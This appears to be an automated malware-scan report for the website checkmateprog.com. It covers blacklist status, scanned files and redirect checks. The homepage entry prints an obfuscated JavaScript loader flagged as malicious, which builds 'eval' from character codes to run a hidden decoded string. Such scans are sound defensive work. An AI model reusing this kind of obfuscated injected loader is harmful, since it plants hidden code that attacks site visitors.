Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=checkmateprog.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://checkmateprog.com/ | 200 OK Content-Length: 7157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var $a="Z63zZ3dZ22Z2566Z2575ncZ2574Z2569on Z2563zZ2528czZ2529Z257breturnZ2520ca+Z2563b+cZ2563+Z2563d+Z2563Z2565+cZ257aZ253b};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK Antivirus reports:
| ||
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://checkmateprog.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: checkmateprog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 19:45:25 GMT
Content-Length: 7157
Content-Type: text/html
Last-Modified: Fri, 18 Jun 2010 10:29:00 GMT
Set-Cookie: TS0194eee0=017643f9b256d5eed631fd26cb2a69f4dc73e582204ca3ed9ef984d658217f87284f43d4d7; Path=/
...7157 bytes of data.
GET / HTTP/1.1
Host: checkmateprog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 19:45:25 GMT
Content-Length: 7157
Content-Type: text/html
Last-Modified: Fri, 18 Jun 2010 10:29:00 GMT
Set-Cookie: TS0194eee0=017643f9b256d5eed631fd26cb2a69f4dc73e582204ca3ed9ef984d658217f87284f43d4d7; Path=/
...7157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: checkmateprog.com
Referer: http://www.google.com/search?q=checkmateprog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: checkmateprog.com
Referer: http://www.google.com/search?q=checkmateprog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.